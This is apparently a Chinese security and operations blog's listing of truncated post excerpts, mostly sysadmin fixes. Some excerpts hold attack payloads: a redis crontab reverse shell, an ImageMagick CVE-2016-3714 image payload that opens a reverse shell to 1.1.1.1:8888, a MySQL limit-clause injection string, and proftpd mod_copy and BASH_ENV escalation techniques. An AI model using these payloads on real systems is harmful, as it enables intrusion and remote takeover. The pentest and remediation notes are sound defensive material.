jumpserver批量执行命令报Error occur: SoftTimeLimitExceeded解决方法 参考https://github.com/jumpserver/jumpserver/issues/3813修改/opt/jumpserver/apps/ops/tasks.py文件,找到@shared_task(soft_time_limit=60, queue="ansible")def run_command_execution(cid, **kwargs): ......这部分,修改soft_time_limit后面的值,单位是s...
开源风控系统radar部署 简介radar是一款2019年发版的开源风控系统。项目官网http://radar.pgmmer.top目前在码云上(https://gitee.com/freshday/radar)有1.2k的stargithub上(https://github.com/wfh45678/radar )有500+的star起因目前已经发布到1.04版,官方的部署文档https://gitee.com/freshday/radar/wikis/manual?sort_id=163744...
【转载】一个人的安全部系列 注:一个人的安全部主要问题在于人力资源的不足,甚至当只有一个人力预算的情况下,安全预算可能严重不足的,但是该有的东西还是不能少,只是实现上偏简单粗暴一些,转两篇文章记录一下,作者写的很详细,方便自己查漏补缺一个人的安全部之企业信息安全建设规划一个人的安全部之大话企业数据安全保护...
【转载】FreeIPA中间CA证书已过期 转载自https://www.kutu66.com//hulianwang/article_188064问题:我们有2个FreeIPA服务器在网络中运行,今天我们发现:https://support.sectigo.com/articles/Knowledge/Sectigo-AddTrust-External-CA-Root-Expiring-May-30-2020中间CA已过期,我们无法连接到LDAP。日志中有以下错误:ipa: INFO: 401 Unauthorized: [
grafana权限管理 注:企业中往往有各种各样的应用系统,对于安全来说只要可能涉及到敏感数据的系统都要了解权限管理,这篇文章介绍grafana的权限管理比较详细,所以转一下,访问可能需要梯子https://medium.com/@maiccaejfeng/grafana-user-%E7%9A%84%E6%AC%8A%E9%99%90%E7%AE%A1%E7%90%86%E4%BB%A5%E5%8F%8A-dashboard-%E7%9A%84%E6%AC%8A%E9%99%90%E7%AE%A1%E7%90%86-d5c5
【转载】绕过ssl pining使用burp抓包微信小程序 参考了https://xz.aliyun.com/t/6102不过文章里是用的windows,我是用的mac模拟器因为Genymotion是付费的,所以我选择了网易mumu,关于网易mumu如何使用adb连接以及配置代理可参考http://mumu.163.com/help/func/20190129/30131_797867.htmlmac安装adb 参考https://www.jianshu.com/p/69ba21b2996c安装frida的话直接执行pip install fr.
Nginx编译安装lua-nginx-module 注:转载自https://www.cnblogs.com/52fhy/p/10164553.htmllua-nginx-module模块可以将Lua的强大功能嵌入NGINX服务器。下载Nginx源码如果已安装Nginx,需要查看当前安装版本的编译参数:$ /usr/local/nginx/sbin/nginx -V nginx version: nginx/1.12.2 built by gcc 4.4.7 20120313 (Red Hat 4.4.7-18) (GCC) built .
【转载】敏感词过滤实现-DFA 前段时间需要搞一个基于敏感词过滤的脚本,最早搞过一个遍历关键词的,普通的用一下还行,像敏感词词库动不动上万的词库,这样效率太多了,网上搜了一下,找到这么一篇文章python实现敏感词过滤的几种方法最后选用了里面的DFA算法,这里记录一下...
hive开启ranger鉴权后set报错的解决方案(阿里云) 阿里云emr集群hive开启ranger后执行set时报错“java.lang.IllegalArgumentException: Cannot modify mapred.job.queue.name at runtime. It is not in list of params that are allowed to be modified at runtime”网上搜这个报错搜到华为云的一篇文章https://support.huaweicloud.com/trouble-mrs/mrs_03
ranger对接ldap过程中遇到的一个坑 修改usersync的install.properties文件后,执行setup.shsetup.py文件存在一个bug,会修改hadoop-conf/core-site.xml文件权限及属主,导致服务不可用。(详见http://issues.apache.org/jira/browse/RANGER-2671)解决方法也比较简单:执行setup.sh前先将{usersync}/...
freeipa证书相关的一些命令 ipa-getcert list #查看全部证书ipa-cacert-manage renew #更新证书ipa-getcert resubmit -i cert_nickname #cert_nickname自行替换,可由ipa-getcert list 命令获取到,结合自带的certmonger服务可以更新证书过期时间最后吐槽下freeipa的证书是个大坑,默认CA是...
freeipa一次启动失败的解决 重启机器后freeipa启动失败执行ipactl start发现连接389端口time out但是对应的ldap服务是开机启动的,服务状态也正常,看了下389是监听在ipv6的,看起来是默认配置不支持ipv6导致于是执行以下命令sysctl net.ipv6.conf.all.disable_ipv6=0sysctl net.ipv6.conf.lo.disable_ipv6=...
对某大型企业的一次web漏洞挖掘过程 前段时间利用周末时间对某大厂做了一次web安全检测,已经很久没搞,但是自己近几年没有脱离业务,并且对业务的理解有进一步的加深,反而可以挖到按以前的思路可能挖不到的漏洞,所以将大概的思考过程记录下来,因为是有稿费的,所以这里只贴上链接吧对某大型企业的一次web漏洞挖掘过程...
渗透中寻找突破口的那些事 注:之前发在乌云drops的一篇文章,汇总了自己对渗透测试中寻找突破口的一些总结,现在乌云drops没有了,所以发在自己blog上。一、寻找目标在自己日常检测中以及观察他人检测思路发现前期收集信息具有很关键的作用,很多时候不需要对某种漏洞有很深的研究,如果前期收集了足够多的目标,只需要检测一些常见的高危漏洞即可有收获常用思路1.网段信息1)通过子域名如果存在域传送这种...
hue连mysql查询条件包含中文时报错'latin-1' codec can't encode 这个问题找了好久,开始按网上的一些做法尝试在hue.ini中添加options={"init_command":"set names utf8;SET CHARACTER SET utf8;SET character_set_connection=utf8;"}但是重启hue后仍然没效果,最后搜到了一篇文章https://blog.csdn.net/supperman_009/artic...
使用reptyr在screen中接管执行中进程 reptyr下载地址https://www.ostechnix.com/reptyr-move-running-process-new-terminal/当你开启了一个占用很长时间的进程,比如wget一个大文件,但是没有在screen等这种环境里打开,又不想占着一个窗口一直等待或者担心ssh中断导致进程退出,就可以使用reptyr了,使用方法也很简单,开启一个screen,在screen中执行...
ssh配置免密登录失败的几种情况 1.最常见的,权限问题,.ssh目前权限要为700,authorized_keys权限要6002.部分操作系统里新创建的用户默认是锁定的,这种情况下认证失败在/var/log/secure中会看到如下错误Nov 21 11:04:26 host-xxxxx sshd[14011]: User test not allowed because account is lockedNov 21...
【转】azkaban的部署过程中遇到的一些坑(部署篇) 转载自 https://my.oschina.net/u/2988360/blog/1537561注:azkaban之前有个配置文件默认要求6G以上可用内存的坑,解决完之后今天又遇到了代码写死3G以上内存的坑,根据报错信息正巧搜到了这篇文章,另外作者的主页https://my.oschina.net/u/2988360里也有其他几篇关于azkaban的文章,推荐1.azkaban源码下载...
【转】redis利用姿势收集 redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面;测试环境:CentOS,RHEL# 利用crontab反弹shellredis-cli flushall echo -e "*/1 * * * * /bin/bash -i >& /...
imagemaick的ghostscript RCE漏洞修复 漏洞信息可以参考imagemaick的ghost script RCE漏洞目前最全的修复方案参考https://www.kb.cert.org/vuls/id/332928编辑ImageMagick的policy文件,默认路径为/etc/ImageMagick/policy.xml在<policymap>标签中增加如下内容 <policy domain="co...
chrome另存为图片无响应解决方法 只要另存为图片浏览器就卡死,尝试重装chrome,清除缓存等仍然无效,最后参考http://tieba.baidu.com/p/2403437252先切换为系统自带的输入法在另存为图片,果然可以了,贴吧里面说的原因是“输入法的状态栏与chrome浏览器的另存为窗口冲突 可能是大家都在抢显示在最前面 ”,设置下输入法状态栏,改成嵌入式的,不用切换也好了,这里记录下...
mysql中执行show full processlist命令条数过多显示不全问题的解决 其实很简单,show full processlist或者show processlist的结果都是从information_schema.processlist表取的结果,直接去查这个表就行了,还可以用sql按条件查询,更方便展示...
推荐一个在线时序图网站 https://www.websequencediagrams.com/支持文字语法直接生成时序图比如自带的示例:title Authentication SequenceAlice->Bob: Authentication Requestnote right of Bob: Bob thinks about itBob->Alice: Authentication Response生...
ossec集成自定义脚本 在使用ossec之前我们这边零零散散的写了几个安全功能的脚本,放在机器上要一直监控进程是不是存在,使用ossec后,可以通过在客户端的ossec.conf中增加如下内容 full_command /usr/bin/python xxx.py 10 其中frequency可以指定执行间隔时间,这里我设置的是10秒执行一次
auditd配置num_logs不生效解决方法 配置auditd的num_logs值为5,但是发现并不生效,初始配置大概是这样log_file = /xxx/xxx.loglog_format = RAWlog_group = rootpriority_boost = 4flush = INCREMENTALfreq = 20num_logs = 5disp_qos = lossydispatcher = /sbin/aud
ossec启动报ossec-remoted(1206): ERROR: Unable to Bind port错误解决方法 今天部署ossec,启动时ossec-remoted一直都无法启动,日志出现如下错误2017/10/20 16:43:53 ossec-remoted: INFO: Started (pid: 2699).2017/10/20 16:43:53 getaddrinfo: Name or service not known2017/10/20 16:43:53 ossec-remoted(1
ssh连接失败自动重连脚本 一个简单的小脚本,有些任务需要ssh连接,如果失败的话可以自动不断重连直至成功#!/bin/bashwhile [ 0 -eq 0 ]do ssh $@ if [ $? -eq 0 ]; then break; else sleep 2 fidone使用也比较简单,保存为ssh.sh 执行sh ssh.sh user@
azkaban任务延迟执行问题跟进 结论:在azkaban配置时如果filter有MinimumFreeMemory,会选择可用内存大于6GB的executor去执行任务,如所有的executor可用内存都不足6GB时则会分配executor失败,导致任务无法执行,一直到内存重新回到大于6GB分配executor成功,任务才会执行。分析过程:第一次出现问题是在8月4号,当时看了下日志,发现如下内容[ExecutorM
又一篇azkaban源码分析 转载至http://www.ivanopt.com/deep-research-source-code-azkaban/本篇文章研究azkaban 调度器以下几个问题:1. Executor 和 Web Server 是如何交互的。2. Executor 的扩展是如何实现的。3. Executor 是如何执行即时任务的。我们从用户提交工作流作为入口,研究一下azka
【转载】Azkaban源码分析 转载自http://www.acyouzi.com/2017/06/15/azkaban/简介因为 azkaban 功能比较简单,所以在实际使用中存在一些需求用对 azkaban 进行定制,比如:跨 Flow 依赖在 job 执行失败时短信报警Flow 的 start node 可能需要检测满足一定条件再触发(时间,数据是否就绪)可能需要设置 job 优先级,在集群
当自动化安装遇到ncurse界面的解决方法(取消交互的通用方法) 要实现某个程序的自动化安装,但是在apt-get的时候就会遇到ncurse界面的交互在这里纠结了一会,最后在https://serverfault.com/questions/227190/how-do-i-ask-apt-get-to-skip-any-interactive-post-install-configuration-steps 找到了解决方案,执行DEBIAN_FR
安全应急方法-发现后门文件 主要指非web类后门,web类后门可参考一中的4及后面部分 1)记录文件stat信息,备份文件并删除 2)通过netstat -anltp命令可查看到当前连接信息及建立连接的进程pid,kill掉可疑连接的进程,且已知进程pid可以执行ls -al /proc/pid值 通过exe对应位置找到后门文件路径 3)通过ps aux命令检查是否存在其他可疑
安全应急方法-站点页面被篡改 把自己工作中积累的一些经验写出来,希望对大家有帮助 1)找到被篡改页面,stat文件记录更改时间及用户等信息 2)将被篡改页面拷贝至其他非web目录,恢复正常页面 3)查看页面被篡改时间的accesslog,找出后门文件及操作ip(可能有多个ip访问后门,需要全部记录,重点记录第一个访问ip) 4)stat后门文件记录时间及操作用户等...
nginx多条件判断 今天一个运维群里有人发了个需求“在nginx怎么拒绝这样的连接1 请求的目标是 / 请求的方法是 POST2 $http_user_agent 是Mozilla/5.0”我给出的方法如下:set $flag 0;if ($http_user_agent = Mozilla/5\.0\.) { set $flag "${flag}1";}location =
centos安装freeipa https://www.globo.tech/learning-center/install-freeipa-centos-7/ 文章说的是centos7,不过亲测centos6.6可安装,缺点是版本比较低,3.0.0的版本,有个证书两年到期的坑,证书到期的话可参考http://www.freeipa.org/page/IPA_2x_Certificate_Renewal
linux根据uid反查用户名 auditd的日志只记录用户uid而不会显示对应用户名,看起来不是很友好,于是需要根据uid反查出用户名,但是有些用户是在ldap上的,因此也不能通过/etc/passwd来查,咨询了一下全栈工程师root,给了一条命令getent passwd uid查了一下果然可以,这里记录下,比如查询uid为33的用户名执行getent passwd 33返回如下结果www-data
linux不用符号实现写文件 今天群里dark牛提出了一个场景,linux下不使用重定向或管道符如何实现写文件,机器不能外联,排除了wget -O curl -o等方法,非交互环境,排除了vim直接写文件,他当时想了一个写到log里然后mv的思路,但是有不少噪音,算不上完美,后来小伟哥提出一个用nohup实现的方法,这里记录一下dark牛也提出了一个先用dd创建一个非空文件然后sed替换的思路
https站点调用百度地图api 一般加载百度地图api的地址为http://api.map.baidu.com/api?v=2.0&ak=ZUO**************AbM这种,里面的涉及的其他资源url也都全部写死为http了,这样导致的问题就是完全没法用,看了下相关文档,找到这个页面http://lbsyun.baidu.com/index.php?title=jspopular/guide/introduction#
记录两个使用http2.0遇到的坑 因为苹果明年元旦开始要求苹果商店里的app使用连接必须都为https,因此最近在搞一些https+http2.0相关的调研,一开始就碰到两个小问题,这里记录下1.下载了新版nginx,修改了配置启用http2.0,但是发现无论如何都还是http1.1,后来看了https://iyaozhen.com/nginx-http2-conf.html 这篇文章,照着里面说的编译nginx的时候带了上新
企业级集中身份认证及授权管理实践freeipa 注:转载自http://blog.csdn.net/xuyaqun/article/details/51596018 关于freeipa写的很全面,推荐一、背景 随着公司服务器、服务、用户越来越多,以前单机用户管理、单机sudo授权的方式已不是发展的要求,故需要做企业级的集中身份认证授权管理(比如:ldap、kerberos、ca、dns、sudo、密码策略),原因有三: 1、
supervisor设置环境变量 今天在机器上配置supervisor守护flume进程的时候发现无法启动,报错是找不到JAVA_HOME,即使在flume_env.sh中配置了JAVA_HOME的路径也不行,后来网上搜了一下,supervisor在program的配置文件中有个environment配置,比如我的这个需求,在配置文件最下面增加environment=JAVA_HOME="xxxxxx"即可,如果多个环境变量用逗号
ufw常用命令记录 ufw default allow #默认允许全部访问,如果希望仅白名单访问就把allow改成deny,切记改成deny后别急着开启ufw,否则啥都连不进来了。。ufw allow from 192.168.1.1 to any port 8888 #允许192.168.1.1访问8888端口 ufw deny 8888
ImageMagick漏洞(cve-2016-3714)利用及修复 利用:如下内容保存为图片格式上传即可(命令部分自行替换)push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'pop graphic-context修复(php):上传时先利用getimage
运维日志排查常用shell 转载至:https://github.com/yaseng/pentest/blob/master/note/audit-log.md前言记录一些排查常见日志的命令,方法wiki,欢迎补充(Markdown 语法)。常用命令查找关键词并统计行数cat 2015_7_25_test_access.log | grep "sqlmap" | wc -l
ssh卡在debug1: SSH2_MSG_KEXINIT sent解决方法 现象:主机间互通正常且可以判断对方ssh端口是开放的,但是用ssh xxx.xxx.xxx.xxx -v这种方式连接的时候会卡在debug1: SSH2_MSG_KEXINIT sent这步解决方法:echo "1454" > /sys/class/net/eth0/mtu原因:详情参考http://techbackground.blogspot.com/2013/06/path-mtu-
Linux下grep显示前后几行信息 转自http://www.cnblogs.com/mfryf/p/3336288.htmlgrep -C 5 foo file 显示file文件里匹配foo字串那行以及上下5行grep -B 5 foo file 显示foo及前5行grep -A 5 foo file 显示foo及后5行
劫持事件处理中针对gzip压缩数据包的处理 现在各种运营商的劫持都比较猖獗,可能不少小伙伴都处理过劫持事件,一般的处理过程可参考http://security.tencent.com/index.php/blog/msg/10与http://security.tencent.com/index.php/blog/msg/81 抓包的方法这里提一下,打开一般都是手机连接wifi,电脑上设置代理,但是有些劫持发生在3g、4g这种,给大家提供
freeipa热备配置过程 注:参考了http://my.oschina.net/u/142602/blog/186481 先在原ipaserver上执行如下命令 kinit adminipa-replica-prepare ipa2.xxx.comscp /var/lib/ipa/replica-info-ipa2.xxx.com.gpg root@ipa2.xxx.com:/root在热备主机上...
redhat使用163的yum源 注:redhat系统设置163yum源过程,今天捣鼓了下,网上很多文章上记录的东西已经404了,记录下,方便自己也方便大家因为需要卸载系统自带的yum,此处先把后面装yum的一些包下载下来wget http://mirrors.163.com/centos/6.7/os/x86_64/Packages/yum-3.2.29-69.el6.centos.noarch.rpmwget htt
常见弱点端口扫描(限速) ./nmap -sT -sV -p 21,80,443,873,2601,2604,3128,4440,6082,6379,8000,8008,8080,8081,8090,8099,8088,8888,9000,9090,9200,11211,27017,28017 --max-hostgroup 10 --max-parallelism 10 --max-rtt-timeout 1000ms
cmd下传文件方法记录 注:以前写在百度空间的,转过来某个web的命令执行,windows主机,不像linux下可以通过wget下个文件很方便,开始尝试echo个vbs下载,如果直接在cmd下是没问题的,但是web端执行发现只要有逗号就连同后面的内容一起没了,后来又尝试一个转码脚本,反正试了半天最后还是没成功,网上找了找,发现了ftp这个方法,记录一下,本地先搭建一个ftp,假设用户名密码为admin/adm
mysql通过存储过程实现aes加解密 前言:数据库难免会存一些敏感数据,密码可以用不可逆算法,但是有些东西本来就需要可逆,比如用户银行卡号、身份证号、手机号等,mysql自身提供了AES_ENCRYPT、AES_DECRYPT来实现aes的加解密,但是利用格式为AES_ENCRYPT('需要加密的字符','加解密用的key'),如果在代码层直接调用的话就会导致把key写的到处都是,那肯定不是大家想要的效果,于是这里自己搞了个存储过程,
linux中对文件名包含空格时处理异常的解决方法 linux对文件批量操作时,比如如下命令(命令仅仅是举个例子,实际情况应该大多不会用cat):for i in `locate *.php|grep '/www/'`;do cat $i;done当文件名包含空格时,加入文件名为aaa bbb传入cat的时候会当成aaa与bbb两个文件,所以结果自然是提示找不到文件这种情况只要把$i替换成$(echo $i|sed 's/ /\
记一次更换域名ip遇到的坑 公司某个域名功能变更,迁移到了新的机器上,原域名test.aaa.com对应ip1.1.1.1当时直接把ip改成了2.2.2.2但是忽略了该域名还配了泛解析,指向cname为test.aaa.com,我这么一改,导致有几个test.aaa.com下的三级域名解析异常,幸好没造成太大的影响记录一下,提醒自己及大家,域名更改ip的时候注意此坑
ssl证书双向认证失效的一种解决方案 ssl证书双向认证配置可参考http://blog.csdn.net/hrayha/article/details/46446653某天突然发现证书认证失效了,所有人访问都校验失败,提示400错误,服务器各项服务都正常,异常的这段时间也没进行过什么操作,起初怀疑nginx的问题,重启了一下,问题依旧,是否为客户端传递证书信息的时候失败了呢,抓包看了下也正常,纠结了一会,同事给出了一个线索,执行
windows系统tomcat降权遇到的小问题及解决方法 前期主要就是创建一个新的guest用户并赋予java及tomcat目录的权限,不了解的同学可以参考http://www.poluoluo.com/server/201301/192791.html win2008操作也基本一样出问题的地方主要是后期以tomcat用户启动,这里我想到的方式是runas,于是执行runas /user:tomcat "D:\apache-tomcat\bin
mysql注入-orderby之后limit位置 今天遇到的,记录下,如下位置产生sql注入select xxx from x order by xx limit {sql}花括号位置为可控的点,支持报错的话可以利用如下语句获取内容http://test.com/test.php?id=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)%23不支持报
用户crontab不执行的解决方法 留作备忘,执行某个sh文件,crontab -e写到了当前用户下,无法执行,脚本直接执行运行正常,写到/etc/crontab下运行正常,尝试将路径改为绝对路径发现依然不行,排除了文件路径问题与权限问题,后来百度了一下,发现http://www.cnblogs.com/wxjnew/p/3490736.html 这篇文章试了下里面提到的方法,在sh文件前加上#!/bin/bashif [
一个linux的提权技巧 注:这篇文章最早在xiaoyu的百度空间看到过,今天又在51cto看到了,顺手转过来,属于一种较通用的提权方法,转自http://www.51cto.com/art/200907/139210.htm一个linux提权用的技巧,放出来攒RP了。OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_EN
proftpd的mod_copy模块未授权调用利用记录 文章来源自《安全参考》第30期,略有改动影响版本:proftpd-1.3.4---proftpd-1.3.51.执行命令nc x.x.x.x 212.执行site cpfr /etc/passwd可以未授权状态复制文件3.执行site cpto /tmp/test可将之前复制的/etc/passwd粘贴到/tmp/test高级用法:s
出现set_locale() failed (5): Input/output error的解决方法 字符集的问题,执行locale -a结果如下xxx@xxxx:~$ locale -aCC.UTF-8en_US.utf8POSIX发现没有中文的,于是执行sudo /usr/share/locales/install-language-pack zh_CN问题解决
freeipa执行命令出现出现(ipa: ERROR: did not receive Kerberos credentials)的解决方法 执行ipa user-xxx这种命令都会出现ipa: ERROR: did not receive Kerberos credentials的错误 解决方法,先执行kinit username(username换成你自己的用户名) 然后解锁用户的话再执行ipa user-unlock username即可
ssl双向认证部署+如何吊销证书 欢迎使用Markdown编辑器写博客本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦:Markdown和扩展Markdown简洁的语法代码块高亮图片链接和图片上传LaTex数学公式UML序列图和流程图离线写博客导入导出Markdown文件丰富的快捷键快捷键加粗 Ctrl + B 斜体 Ctrl + I 引用 Ctrl
freeipa安装客户端后密码不正确解决方法 某台主机安装freeipa客户端后发现从其他主机连过来无法直接传递ticket,仍然需要输入密码,并且输入密码提示不正确,开始以为是kerberos的问题,但是本机执行kinit user正常,说明与kerberos通信正常,那sssd出现问题的可能性就比较大了,打开了sssd的log(参考http://blog.csdn.net/hrayha/article/details/45895925),
mysql更改datadir后无法启动解决 备注:今天同事更改mysql的datadir后直接重启mysql导致无法启动,网上查了下,执行mysql_install_db --user=mysql --basedir=/usr --datadir=/data/mysql后发现仍然存在问题,后来在网上搜到这篇文章解决了问题,记录下,转载自http://www.518z.com/seo/linuxxilie/linuxjiaocheng/201
sssd配置log 今天sssd出了点问题导致freeipa账户登不上了,重启sssd恢复正常,但是发现这货默认不记日志,所以记下https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Deployment_Guide/SSSD-Troubleshooting.html
mysql执行update提示ERROR 1205 (HY000): Lock wait timeout exceeded; try restarting transaction的应急解决方法 mysql执行update提示ERROR 1205 (HY000): Lock wait timeout exceeded; try restarting transaction的应急解决方法